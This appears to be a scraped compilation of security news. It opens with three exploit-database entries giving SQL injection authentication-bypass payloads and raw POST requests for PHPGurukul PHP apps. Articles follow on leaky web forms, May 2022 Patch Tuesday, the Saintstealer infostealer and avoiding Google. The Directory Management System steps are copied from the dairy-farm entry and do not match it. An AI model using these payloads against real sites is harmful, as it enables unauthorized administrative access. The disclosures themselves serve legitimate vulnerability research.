Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.

    # Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - SQL Injection Authentication Bypass
    # Date: 29-09-2021
    # Exploit Author: sudoninja
    # Vendor Homepage: https://phpgurukul.com
    # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
    # Version: 1.0
    # Tested on: XAMPP / Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/ccms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step4 – Change the username to ' OR 1 -- -  and password to ccms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC 
    
    POST /ccms/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/ccms/
    Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
    Upgrade-Insecure-Requests: 1
    
    username='%20OR%201%20--%20-&password=ccms&login=

CVE-2022-29009: Offensive Security’s Exploit Database Archive

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
    # Date: 2021-09-30
    # Exploit Author: sanjay singh
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step 4 – Change the username to admin' or '1'='1  and password to dfsms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC
    
    POST /dfsms/index.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 57
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dfsms/index.php
    Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
    Upgrade-Insecure-Requests: 1
    
    username=admin%27+or+%271%27%3D%271&password=dfsms&login=

CVE-2022-29007: Offensive Security’s Exploit Database Archive

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.

    # Exploit Title: Directory Management System  1.0 - SQL Injection Authentication Bypass
    # Date: 2021-10-01
    # Exploit Author: SUDONINJA
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step 4 – Change the username to admin' or '1'='1  and password to dfsms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC
    
    POST /dms/admin/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 83
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dms/admin/
    Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
    Upgrade-Insecure-Requests: 1
    
    username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login

CVE-2022-29006: Offensive Security’s Exploit Database Archive

A surprising number of the top 100,000 websites effectively include keyloggers that covertly snag everything you type into a form.

When you sign up for a newsletter, make a hotel reservation, or check out online, you probably take for granted that if you mistype your email address three times or change your mind and X out of the page, it doesn't matter. Nothing actually happens until you hit the Submit button, right? Well, maybe not. As with so many assumptions about the web, this isn't always the case, according to new research: A surprising number of websites are collecting some or all of your data as you type it into a digital form.

Researchers from KU Leuven, Radboud University, and University of Lausanne crawled and analyzed the top 100,000 websites, looking at scenarios in which a user is visiting a site while in the European Union and visiting a site from the United States. They found that 1,844 websites gathered an EU user's email address without their consent, and a staggering 2,950 logged a US user's email in some form. Many of the sites seemingly do not intend to conduct the data-logging but incorporate third-party marketing and analytics services that cause the behavior.

After specifically crawling sites for password leaks in May 2021, the researchers also found 52 websites in which third parties, including the Russian tech giant Yandex, were incidentally collecting password data before submission. The group disclosed their findings to these sites, and all 52 instances have since been resolved.

“If there’s a Submit button on a form, the reasonable expectation is that it does something—that it will submit your data when you click it,” says Güneş Acar, a professor and researcher in Radboud University's digital security group and one of the leaders of the study. “We were super surprised by these results. We thought maybe we were going to find a few hundred websites where your email is collected before you submit, but this exceeded our expectations by far.”

The researchers, who will present their findings at the Usenix security conference in August,  say they were inspired to investigate what they call “leaky forms” by media reports, particularly from Gizmodo_,_ about third parties collecting form data regardless of submission status. They point out that, at its core, the behavior is similar to so-called key loggers, which are typically malicious programs that log everything a target types. But on a mainstream top-1,000 site, users probably won't expect to have their information keylogged. And in practice, the researchers saw a few variations of the behavior. Some sites logged data keystroke by keystroke, but many grabbed complete submissions from one field when users clicked to the next.

“In some cases, when you click the next field, they collect the previous one, like you click the password field and they collect the email, or you just click anywhere and they collect all the information immediately," says Asuman Senol, a privacy and identity researcher at KU Leuven and one of the study coauthors. "We didn’t expect to find thousands of websites; and in the US, the numbers are really high, which is interesting,” 

The researchers say that the regional differences may be related to companies being more cautious about user tracking, and even potentially integrating with fewer third parties, because of the EU's General Data Protection Regulation. But they emphasize that this is just one possibility, and the study didn't examine explanations for the disparity.

Through a substantial effort to notify websites and third parties collecting data in this way, the researchers found that one explanation for some of the unexpected data collection may have to do with the challenge of differentiating a “submit” action from other user actions on certain web pages. But the researchers emphasize that from a privacy perspective, this is not an adequate justification.

Since completing their paper, the group also had a discovery about Meta Pixel and TikTok Pixel, invisible marketing trackers that services embed on their websites to track users across the web and show them ads. Both claimed in their documentation that a customers could turn on “automatic advanced matching,” which would trigger data collection when a user submitted a form. In practice, though, the researchers found that these tracking pixels were grabbing hashed email addresses, an obscured version of email addresses used to identify web users across platforms, before submission. For US users, 8,438 sites may have been leaking data to Meta, Facebook’s parent company, through pixels, and 7,379 sites may be impacted for EU users. For TikTok Pixel, the group found 154 sites for US users and 147 for EU users.

The researchers filed a bug report with Meta on March 25, and the company quickly assigned an engineer to the case, but the group has not heard an update since. The researchers notified TikTok on April 21—they discovered the TikTok behavior more recently—and have not heard back. Meta and TikTok did not immediately return WIRED's request for comment about the findings.

“The privacy risks for users are that they will be tracked even more efficiently; they can be tracked across different websites, across different sessions, across mobile and desktop,” Acar says. “An email address is such a useful identifier for tracking, because it’s global, it’s unique, it’s constant. You can’t clear it like you clear your cookies. It's a very powerful identifier.”

Acar also points out that, as tech companies look to phase out cookie-based tracking in a nod to privacy concerns, marketers and other analysts will rely more and more heavily on static IDs like phone numbers and email addresses.

Since the findings indicate that deleting data in a form before submitting it may not be enough to protect yourself from all collection, the researchers created a Firefox extension called LeakInspector to detect rogue form collection. And they say they hope their findings will raise awareness about the issue, not only for regular web users but for website developers and administrators who can proactively check whether their own systems or any of the third parties they're using are collecting data from forms without consent. 

Leaky forms are just one more type of data collection to be wary of in an already extremely crowded online field.

Thousands of Top Websites See What You Type—Before You Hit Submit

Microsoft on Tuesday rolled out fixes for as many as 74 security vulnerabilities, including one for a zero-day bug that's being actively exploited in the wild.
Of the 74 issues, seven are rated Critical, 66 are rated Important, and one is rated low in severity. Two of the flaws are listed as publicly known at the time of release.
These encompass 24 remote code execution (RCE), 21 elevation of

Microsoft on Tuesday rolled out fixes for as many as 74 security vulnerabilities, including one for a zero-day bug that's being actively exploited in the wild.

Of the 74 issues, seven are rated Critical, 66 are rated Important, and one is rated low in severity. Two of the flaws are listed as publicly known at the time of release.

These encompass 24 remote code execution (RCE), 21 elevation of privilege, 17 information disclosure, and six denial-of-service vulnerabilities, among others. The updates are in addition to 36 flaws patched in the Chromium-based Microsoft Edge browser on April 28, 2022.

Chief among the resolved bugs is CVE-2022-26925 (CVSS score: 8.1), a spoofing vulnerability affecting the Windows Local Security Authority (LSA), which Microsoft describes as a "protected subsystem that authenticates and logs users onto the local system."

"An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM," the company said. "This security update detects anonymous connection attempts in LSARPC and disallows it."

It's also worth noting that the CVSS severity rating of the flaw would be elevated to 9.8 should it be combined with NTLM relay attacks like PetitPotam, making it a critical issue.

"Being actively exploited in the wild, this exploit allows an attacker to authenticate as approved users as part of an NTLM relay attack - letting threat actors gain access to the hashes of authentication protocols," Kev Breen, director of cyber threat research at Immersive Labs, said.

The two other publicly-known vulnerabilities are as follows -

*   CVE-2022-29972 (CVSS score: 8.2) - Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver (aka SynLapse)
*   CVE-2022-22713 (CVSS score: 5.6) - Windows Hyper-V Denial-of-Service Vulnerability

Microsoft, which remediated CVE-2022-29972 on April 15, tagged it as "Exploitation More Likely" on the Exploitability Index, making it imperative affected users apply the updates as soon as possible.

Also patched by Redmond are several RCE bugs in Windows Network File System (CVE-2022-26937), Windows LDAP (CVE-2022-22012, CVE-2022-29130), Windows Graphics (CVE-2022-26927), Windows Kernel (CVE-2022-29133), Remote Procedure Call Runtime (CVE-2022-22019), and Visual Studio Code (CVE-2022-30129).

Cyber-Kunlun, a Beijing-based cybersecurity company, has been credited with reporting 30 of the 74 flaws, counting CVE-2022-26937, CVE-2022-22012, and CVE-2022-29130.

What's more, CVE-2022-22019 followed an incomplete patch for three RCE issues in the Remote Procedure Call (RPC) runtime library last month — CVE-2022-26809, CVE-2022-24492, and CVE-2022-24528 — that were addressed by Microsoft in April 2022.

Exploiting the flaw would allow a remote, unauthenticated attacker to execute code on the vulnerable machine with the privileges of the RPC service, Akamai said.

The Patch Tuesday update is also notable for resolving two privilege escalation (CVE-2022-29104 and CVE-2022-29132) and two information disclosure (CVE-2022-29114 and CVE-2022-29140) vulnerabilities in the Print Spooler component, which has long posed an attractive target for attackers.

**Software Patches from Other Vendors**

Besides Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Cisco
*   Citrix
*   Dell
*   F5
*   Google Chrome
*   HP
*   Intel
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   Qualcomm
*   SAP
*   Schneider Electric, and
*   Siemens

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Fix for New Zero-Day with May 2022 Patch Tuesday Updates

Cybersecurity researchers have dissected the inner workings of an information-stealing malware called Saintstealer that's designed to siphon credentials and system information.
"After execution, the stealer extracts username, passwords, credit card details, etc.," Cyble researchers said in an analysis last week. "The stealer also steals data from various locations across the system and

Cybersecurity researchers have dissected the inner workings of an information-stealing malware called **Saintstealer** that's designed to siphon credentials and system information.

"After execution, the stealer extracts username, passwords, credit card details, etc.," Cyble researchers said in an analysis last week. "The stealer also steals data from various locations across the system and compresses it in a password-protected ZIP file."

A 32-bit C# .NET-based executable with the name "saintgang.exe," Saintstealer is equipped with anti-analysis checks, opting to terminate itself if it's running either in a sandboxed or virtual environment.

The malware can capture a wide range of information that ranges from taking screenshots to gathering passwords, cookies, and autofill data stored in Chromium-based browsers such as Google Chrome, Opera, Edge, Brave, Vivaldi, and Yandex, among others.

It can also steal Discord multi-factor authentication tokens, files with .txt, .doc, and .docx extensions as well as extract information from VimeWorld, Telegram, and VPN apps like NordVPN, OpenVPN, and ProtonVPN.

Besides transmitting the compressed information to a Telegram channel, the metadata related to the exfiltrated data is sent to a remote command-and-control (C2) server.

What's more, the IP address linked to the C2 domain — 141.8.197\[.\]42 — is tied to multiple stealer families such as Nixscare stealer, BloodyStealer, QuasarRAT, Predator stealer, and EchelonStealer.

"Information stealers can be harmful to individuals as well as large organizations," the researchers said. "If even unsophisticated stealers like Saintstealer gain infrastructural access, it could have devastating effects on the cyberinfrastructure of the targeted organization."

The disclosure comes as a new infostealer named Prynt Stealer has surfaced in the wild that can also perform keylogging operations and financial theft using a clipper module.

"It can target 30+ Chromium-based browsers, 5+ Firefox-based browsers, and a range of VPN, FTP, messaging, and gaming apps," Cyble noted last month.

Sold for $100 for a one-month license and $900 for a lifetime subscription, the malware joins a long list of other recently advertised stealers, including Jester, BlackGuard, Mars Stealer, META, FFDroider, and Lightning Stealer.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Detail Saintstealer and Prynt Stealer Info-Stealing Malware Families

Google and all its products can dominate the average person's life. Here's an in-depth guide on how to remove yourself from their ecosystem.
The post How to remove Google from your life appeared first on Malwarebytes Labs.

Swearing off a company used to be easier. Rude customer service, an unfortunate bout of food poisoning, even standing up for workers’ rights against the alleged involvement of a private company to order a country’s military to brutally quash a strike—almost every facet of an individual boycott could be satisfied by simply refusing to purchase a company’s products.

But such a move can be far more difficult to accomplish today, especially when you’re trying to sever your relationship with an Internet conglomerate. Tired of Facebook? Be sure to jump off Instagram and WhatsApp, too, which are both owned by the social media giant. Over Amazon? Good luck trying to navigate the web without landing on at least one site hosted by Amazon Web Services.

And what about Google?

The online behemoth has become so much more than a search engine, as it owns and produces hardware like Android phones, Google Pixel phones, Nest thermostats, and FitBit devices, while also operating Google Chrome, Google Mail, Google Calendar, Google Hangouts, YouTube, and Waze.

Saying goodbye to Google, then, isn’t as easy as refusing to buy an Android phone. It means likely changing several aspects of your life, including some that will affect the people around you.

Thankfully, this daunting task has already been taken on by the cybersecurity evangelist Carey Parker, who spoke recently on the Lock and Code podcast from Malwarebytes. According to Parker, it isn’t that he wanted to remove Google because he “hates” its products—if anything, he’s a fan. Instead, he wanted to start supporting other companies that will respect him and his data privacy.

“Google knows so much about us,” Parker said, explaining that Google makes the overwhelming majority of its revenue from online advertising, which it can only do because of how much data it collects from its users. “For me, it was about limiting as best I could how much information Google knows about me, removing as much as I can for things they already know about me, and then wanting to support companies who put privacy first.”

For anyone who has wanted to take a similar plunge into a Google-less life, here are some of the tips that Parker shared with us.

****Start with the individual—Search, Chrome, and Android****

Getting rid of everything Google product all at once could be a disaster, as there are simply too many services and products to track. Instead, Parker began the first steps of his experiment by only removing the products that directly affected him.

“I started with the easiest things—at least I think the easiest things,” Parker said. “The ones that have maybe the least tendrils into other things. They don’t affect anybody but yourself.”

For Parker, that meant removing and finding new providers for Google Search and the web browser Google Chrome. When it comes to stepping away from Android devices, Parker found that easy—he’s been using iPhones for years.

In finding an alternative to Google Search, Parker offered two suggestions: DuckDuckGo and the search engine Startpage, both of which claim to refuse any user data tracking for revenue purposes. Instead, the companies say they serve purely contextual ads based on the searches themselves—like showing ads for Nike and Adidas for anyone looking for shoes—and they do not record or keep data on users’ specific searches. In fact, Parker said, Startpage actually works with Google to deliver search results, but the company tells users that it refuses to collect user IP addresses, device information, and browsing history.

“You don’t have to track people to make money,” Parker said, “and Startpage is proof of that.”

In looking for a different, privacy-focused browser, Parker suggested his personal choice, Mozilla’s Firefox, and also the up-and-coming browser Brave.

****Bigger shifts with Gmail and GCal****

Having found different solutions for searching and browsing the Internet, Parker said he then focused his attention on finding alternatives to Google services that impact those around him.

“\[Google Search and Google Chrome were\] the first tier, and then, the next one, which is harder—a lot harder, because it involves other people—are Google email and Google calendar, Gmail and Gcal,” Parker said, “I’ve got shared calendars with my family and I am not going to expect them to drop Google like I am trying to do, so for that reason, I’m going to be stuck there for a little while, but I can minimize it.”

After researching the many options out there, Parker found two email providers—one that fulfills much of Google’s functionality and integration with a calendar function, and another that provides end-to-end encryption on messages sent and received between users of the same program.

The first suggestion is Fastmail. Fastmail, Parker said, is a for-profit email provider that users pay to use through a monthly subscription. The email provider also has a calendar solution that works directly with its main product. Even better, Parker said, is that Fastmail respects its users’ data.

“\[Fastmail\] explicitly say they don’t mine your data, and they are privacy-focused even if they’re not end-to-end encrypted by default,” Parker said. “It’s a really great service and it has the full suite of email, calendar and contacts, among other things. I use it for all my business stuff and some personal stuff.”

For user who wish to prioritize security, Parker suggested ProtonMail, which, by default, provides end-to-end encryption for all emails sent between ProtonMail users. That means that even if your emails get intercepted by a third party along route, those emails cannot be read by anyone other than you and your intended recipient.

****More complexity with Google Drive and Google Docs****

For users who want to take even more data out of Google’s view, there are just a couple final products to remove from the daily workflow. Those are the cloud storage service Google Drive and the cloud-based word processor Google Docs.

For each product, Parker encountered headaches and obstacles, but he managed to find alternatives that both respected his privacy and provided similar feature sets and functionality.

In finding a proper cloud storage platform, Parker recognized that some of the major players, such as Box and Dropbox, did not provide meaningful encryption for users’ data that would prevent the companies from scanning and gleaning information from user files.

Parker offered several suggestions depending on what users want most. If a user wants to securely send a private file to someone else, he recommended the online services Swiss Transfer and Mega, which can give users the option to set certain parameters on how they share a file, including how long a shareable link is active and whether the file requires a password to access.

For pure storage options, Parker recommended the service Sync.com because of its client-side encryption. Many of the cloud storage providers today, Parker explained, will promise to keep your data secure, but they will also hold the decryption keys to anything that you store on their servers.

“Machines will review the files that you have stored on these drives, either for advertising purposes or, a lot of times it’s for copyright violations,” Parker said. “They’ll look and see—are you trading movies or music with other people? And they’ll flag that and give you grief.”

But after extensive research, Parker found that Sync.com actually provided users with a type of encryption that the company cannot work around.

“\[Sync.com is\] end-to-end encrypted,” Parker said, “meaning that, even if behind the scenes, Sync.com uses Amazon Web Services, Amazon can’t see what my files are.”

As to finding an alternative to Google Docs, Parker said he struggled a great deal, simply because Google Docs works so well. After first trying to adopt a solution that Parker said is “secure, it’s private, it’s end-to-end encrypted—as far as checking boxes, it checks them,” Parker grew disappointed with the solution’s interface and its sluggish response time. Then, a second option called OnlyOffice was, as Parker put it, “not for the faint of heart” because of a high technical bar which could require renting out cloud servers.

The best, most accessible alternative, then, Parker said, is Skiff, which has an easy-to-use interface, but which only has a replacement for Google Docs, and not for the other, related tools, like Google Spreadsheets or Google Slides. Skiff’s tool can be found at Skiff.org.

****Step by step****

Taking Google out of your life can be a long and complex process, but it doesn’t have to be hard at the very beginning. And remember, if you ever start to doubt what you’re doing, think about what made you want to start the process. If you’re anything like Parker, you’re motivated to keep your data private and out of the hands of a company that is making money off of you and your browsing habits.

“At the end of the day, we are in an age of surveillance capitalism,” Parker said, “and Google is a publicly traded company with a fiduciary responsibility to maximize profits for their shareholders. Absent privacy regulations in the United States, the financial incentives are just too great to ignore. That’s money off the table.”

Parker emphasized that until Google creates—and there’s no evidence this will happen—a version of its products that users can pay for with their own funds rather than with their own privacy, that users should assume that “at any moment, any Google product unfortunately can and probably will, somehow, monetize your data.”

As the saying goes, Parker said, “if the product is free, then you are probably the product.”

You can listen to our full conversation with Parker on the Lock and Code podcast below.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

Tag

#firefox